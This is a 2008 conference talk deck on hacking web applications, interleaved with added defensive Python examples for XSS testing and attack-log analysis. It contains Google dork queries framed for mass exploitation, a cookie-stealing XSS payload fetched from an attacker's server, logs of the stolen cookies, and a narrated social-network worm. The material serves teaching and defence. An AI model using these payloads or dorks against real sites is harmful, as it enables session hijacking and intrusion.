Starwest 2008
    1. Exploiting Web Security Vulnerabilities. Caleb Sima, Chief Technologist – Application Security Center
    2. Who am I?
       • Founder and CTO of SPI Dynamics
       • In security for 11 years
       • Author of Hacking Web Applications Exposed
       • Frequent speaker (Black Hat, RSA, Infosec)
       • S1 1996-1997
       • ISS X-Force/Pentest 1997-2000
       • SPI 2000-2007
       • Current Chief Technologist for HP Application Security
       • Caleb Sima (
    3. Who is (was) SPI Dynamics?
       • Founded in 2000
       • 140+ employees
       • 1200+ customers
       • Team of security experts – SPI Labs
       • “We create software to identify how hackers break into websites”
    4. Agenda
       • Platform Issues
       • Mis-configurations
       • HTTP
       • HOW TO: SQL Injection
       • HOW TO: Blind SQL Injection
       • Hacking an online dating website – XSS (Real)
       • HOW TO: Session Hijacking
       • Mis-configurations / Privilege escalations (Real)
       • College online registration hack (Real)
       • Hacking an online bank (Real)
       • Touch on AJAX
    5. Web Applications Breach the Perimeter (diagram: Internet → DMZ → Trusted Inside → Corporate Inside)
       • Protocols arriving from the Internet: HTTP(S), IMAP, FTP, SSH, TELNET, POP3
       • Firewall only allows PORT 80 (or 443 SSL) traffic from the Internet to the web server (rule: Any – Web Server: 80)
       • Firewall only allows applications on the web server to talk to the application server
       • Firewall only allows the application server to talk to the database server
       • Tiers shown: web server (IIS, SunOne, Apache), application server (ASP .NET, WebSphere, Java), database (SQL, Oracle, DB2)
    6. Web Application Vulnerabilities: web application vulnerabilities occur in multiple areas (Platform, Administration, Application)
       • Known Vulnerabilities, Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing, Application Mapping, Cookie Manipulation, Custom Application Scripting, Parameter Manipulation, Reverse Directory Traversal, Brute Force, Cookie Poisoning/Theft, Buffer Overflow, SQL Injection, Cross-site scripting
    7. Essential HTTP Tools
       • [Firefox] Firebug
       • [Firefox] Live HTTP Headers
       • [Firefox] HTTPFox
       • [IE] IEWatch
       • Microsoft Fiddler
       • HP ASC Toolkit
       • Burp Proxy
       • [Firefox] Developers toolkit
    9. Google Hacking
       • Find vulnerable sites using Google (old method – new life)
       • Example search queries
         • “filetype:mdb inurl:admin” – 180 results
         • “filetype:xls inurl:admin” – 14,100 results
         • “ORA-00921: unexpected end of SQL command” – 3,470 results
         • “allintitle:Netscape Enterprise Server Home Page” – 431 results
    10. Mass Exploitation
       • Use search engines to narrow your attack victims.
       • “inurl:id= filetype:asp site:gov” – 572,000 results
       • “inurl:id= filetype:asp site:com” – 7,150,000 results
       • “inurl:id= filetype:asp site:org” – 3,240,000 results
       • Use this list as a baseline for identifying SQL injection vulnerabilities
    11. Mass Exploitation using Google
       • Took 1 hour of coding
       • 500 vulnerable sites were found in 1 minute and 26 seconds
    12. Massive Automation
    13. SQL Injection Worms
       • 4/24/2008 – 510,000 infected sites
       • 1/8/2008 – 70,000 infected sites
         • ;683627551
    15. Simple XSS Checking
    16. Fill in the forms
    17. User input is reflected back
    18. Let’s try some JavaScript
    19. Bingo!
    20. XSS on a large scale
       • Create a simple profile
       • Which text is seen by the most people?
    21. Let’s run a test
       • Plain vanilla XSS entry in the headline
    22. Let’s view the profile and see what happens
    23. Success!
    24. Does it execute in a displayed list of results?
    25. Yes it does.
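Slides 16 to 25 perform the reflection check by hand: submit a marker, look at the profile and the search results, and see whether it comes back as markup. The following is an added example, not code from the deck, that turns that manual check into a QA test. The two page renderers and the marker string are constructed for the example: `render_results_unsafe` concatenates the query into the page the way the dating site did, and `render_results_safe` shows the fix, HTML-encoding the value at the point it enters the page.

```python
"""QA check for reflected XSS: does user input come back as markup or as text?

Added example (not from the original slides). Two tiny renderers stand in for
a real search-results page; reflection_check() is the automated form of the
manual probe on slides 16 to 25.
"""
import html

# Constructed probe: harmless, distinctive, and it carries the characters that
# matter (<, >, quotes). Nothing here points at a real site.
PROBE = '<xss-marker attr="1">'


def render_results_unsafe(query: str) -> str:
    """Deliberately vulnerable: the query lands in the page verbatim."""
    return (
        "<html><body><h1>Search results</h1>"
        f"<p>You searched for: {query}</p>"
        "</body></html>"
    )


def render_results_safe(query: str) -> str:
    """Hardened: encode the value where it enters HTML text content."""
    return (
        "<html><body><h1>Search results</h1>"
        f"<p>You searched for: {html.escape(query, quote=True)}</p>"
        "</body></html>"
    )


def reflection_check(render, probe: str = PROBE) -> dict:
    """Classify how `render` reflects `probe`.

    reflected: the probe text appears somewhere in the response
    unencoded: it appears verbatim, i.e. as live markup (reflected XSS)
    encoded:   only the entity-encoded form appears (safe reflection)
    """
    page = render(probe)
    unencoded = probe in page
    encoded = html.escape(probe, quote=True) in page
    return {
        "reflected": unencoded or encoded,
        "unencoded": unencoded,
        "encoded": encoded and not unencoded,
    }


if __name__ == "__main__":
    for name, fn in (("unsafe", render_results_unsafe), ("safe", render_results_safe)):
        print(name, reflection_check(fn))
```

The check distinguishes "input is echoed" (slide 17, harmless on its own) from "input is echoed as markup" (slide 19): a test suite should fail only on the `unencoded` case. The hardened renderer encodes for HTML text content; a value placed inside an attribute, a URL or a script block needs the encoding appropriate to that context instead.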
    26. Create an external JS file (diagram: Dating Website, Attack Server)
       • 1. Attacker creates exploit profile
       • 2. Victim executes date search
       • 3. Headline is viewed. Exploited
       • 4. Victim requests attack payload
       • 5. Payload delivered.
       • 6. Victim sends cookie to attacker
    27. Create the exploit payload
       • document.write("<img src= " + document.cookie + " width=0 >")
    28. Let’s execute the attack
       • Embed the script to download from the attacker’s server.
    29. View the profile
       • Success. Invisible execution
    30. Execute the attack via search
       • Everything looks normal
    31. Check out the attack logs
       • 2006-08-31 19:54:47 GET /a.js - 80 - Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 200 0 0
       • 2006-08-31 19:54:47 GET /pIDCode=2AD4A95012D09660 - 80 - Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 404 0 2
       • 2006-08-31 19:55:48 GET /a.js - 80 - Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 200 0 0
       • 2006-08-31 19:55:48 GET /pIDCode=2AD4A95012D01871 - 80 - Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 404 0 2
       • 2006-08-31 19:56:33 GET /a.js - 80 - Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 304 0 0
       • 2006-08-31 19:56:33 GET /pIDCode=2AD4A95012D04309 - 80 - Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 404 0 2
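The log on slide 31 is what an incident responder gets when the attack server's log is seized or subpoenaed, and the questions are the same as in any cookie-theft case: how many victims, which cookie, which browsers. The following is an added example, not code from the deck, that parses the six lines shown on the slide (copied verbatim; the client-IP column is absent on the slide, so it is absent here) and pairs each fetch of the payload script with the request that carried the victim's cookie. The field order, the `/NAME=VALUE` shape of the exfiltration request and the five-second pairing window are assumptions of this example.

```python
"""Reconstruct the cookie-theft requests in the slide 31 attack-server log.

Added example, not from the original deck. LOG holds the six lines from the
slide (IIS W3C extended format; no client-IP column on the slide). The
parser pairs each /a.js fetch with the follow-up request whose path is the
stolen cookie, which is what a responder does with a seized attack-server log.
"""
import re
from datetime import datetime, timedelta

LOG = """\
2006-08-31 19:54:47 GET /a.js - 80 - Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 200 0 0
2006-08-31 19:54:47 GET /pIDCode=2AD4A95012D09660 - 80 - Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 404 0 2
2006-08-31 19:55:48 GET /a.js - 80 - Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 200 0 0
2006-08-31 19:55:48 GET /pIDCode=2AD4A95012D01871 - 80 - Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 404 0 2
2006-08-31 19:56:33 GET /a.js - 80 - Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 304 0 0
2006-08-31 19:56:33 GET /pIDCode=2AD4A95012D04309 - 80 - Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 404 0 2
"""

# Assumed field order (it matches the slide): date time cs-method cs-uri-stem
# cs-uri-query s-port cs-username cs(User-Agent) sc-status sc-substatus sc-win32-status.
# The User-Agent has '+' for spaces in IIS logs, so every field is whitespace-free.
LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<method>\S+) (?P<stem>\S+) (?P<query>\S+) "
    r"(?P<port>\d+) (?P<user>\S+) (?P<ua>\S+) (?P<status>\d{3}) (?P<sub>\d+) (?P<win32>\d+)$"
)
PAYLOAD_PATH = "/a.js"  # the external script from slide 26
# The payload wrote document.cookie straight into an <img src>, so the stolen
# cookie arrives as the request path. Assumption: one /NAME=VALUE pair per line.
COOKIE_RE = re.compile(r"^/(?P<name>[A-Za-z0-9_]+)=(?P<value>[^/;\s]+)$")


def parse_line(line: str):
    """One W3C log line -> dict, or None for a line that does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
    rec["status"] = int(rec["status"])
    return rec


def parse_log(text: str):
    return [r for r in map(parse_line, text.splitlines()) if r]


def reconstruct(entries, window: timedelta = timedelta(seconds=5)):
    """Pair each payload fetch with the cookie request that followed it.

    The pairing key is the User-Agent (the slide has no client IP); a cookie
    request counts only if the same browser fetched /a.js within `window`.
    200 and 304 both mean the script ran, and the 404 on the cookie request
    changes nothing: the request line is logged whether or not a handler exists.
    """
    last_fetch = {}
    victims = []
    for e in entries:
        if e["stem"] == PAYLOAD_PATH:
            last_fetch[e["ua"]] = e["ts"]
            continue
        m = COOKIE_RE.match(e["stem"])
        if not m:
            continue
        fetched = last_fetch.get(e["ua"])
        if fetched is not None and e["ts"] - fetched <= window:
            victims.append({"ts": e["ts"], "ua": e["ua"],
                            "cookie": m["name"], "value": m["value"]})
    return victims


def summarize(victims):
    return {
        "victims": len(victims),
        "cookie_names": sorted({v["cookie"] for v in victims}),
        "distinct_browsers": len({v["ua"] for v in victims}),
        "values": [v["value"] for v in victims],
    }


if __name__ == "__main__":
    found = reconstruct(parse_log(LOG))
    for v in found:
        print(v["ts"], v["cookie"], v["value"], v["ua"][:45])
    print(summarize(found))
```

On the slide's six lines this yields three victims, one cookie name (`pIDCode`) and two distinct browsers. Two defender points fall out of the reconstruction: the 404s are not failures, since the value is in the request line and was logged before any handler ran; and the theft worked only because the session cookie was readable from `document.cookie`, which is what the `HttpOnly` cookie attribute (honoured by the Internet Explorer versions in these User-Agents) prevents.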
    32. (untitled)
       • Social networking – the more people who make you their “friend,” the more popular you are
       • Personal spaces highly customizable, including upload of HTML that displays to other users
       • Uh-oh…
       • What if I could “infect” everyone who viewed my profile and automatically make me their friend?
    33. The Result (diagram: Victim browser, Evil profile, Victim profile, 1: Caleb)
       • Victim becomes “carrier” and can now infect others; worm propagates
    34. Hilarity
       • 10/04, 12:34 pm: You have 73 friends.
       • 1 hour later, 1:30 am: You have 73 friends and 1 friend request.
       • 7 hours later, 8:35 am: You have 74 friends and 221 friend requests.
         • “Woah. I did not expect this much. I'm surprised it even worked..”
       • 1 hour later, 9:30 am: You have 74 friends and 480 friend requests.
         • “Oh wait, it's exponential, isn't it. Crap.”
       • 1 hour later, 10:30 am: You have 518 friends and 561 friend requests.
       • 3 hours later, 1:30 pm: You have 2,503 friends and 6,373 friend requests
         • “I'm canceling my account. This has gotten out of control.”
       • 5 hours later, 6:20 pm: You have 2,503 friends. 917,084 friend requests
         • “I timidly go to my profile to view the friend requests. It's official. I'm popular.”
    35. Real Exploitation
       • Browser zombies
       • Control any victim browser
       • Capture keystrokes
       • Capture browsing activity
       • Force the user to view sites of your choosing
    36. Consumable Input
       • Filenames
       • Contents of files
       • RFID tags
       • Credit cards
       • Barcodes
       • Flash/Ajax/Silverlight
    37. Welcome to the Age of User Generated Content
    38. Why Web Application Risks Occur: The Web Application Security Gap
       • Security Professionals Don’t Know The Applications
         • “As a Network Security Professional, I don’t know how my company’s web applications are supposed to work, so I deploy a protective solution…but don’t know if it’s protecting what it’s supposed to.”
       • Application Developers and QA Professionals Don’t Know Security
         • “As an Application Developer, I can build great features and functions while meeting deadlines, but I don’t know how to develop my web application with security as a feature.”
    39. What we do: Enterprise Application Security Assurance (diagram of the lifecycle Plan → Requirements → Design → Build → Test → Production)
       • DevInspect – Source Code Validation
       • QAInspect – QA/Integration Testing
       • WebInspect – Production Assessment
       • Assessment Management Platform (AMP) – Enterprise Security Assurance & Reporting
    40. [email_address]
       • Questions?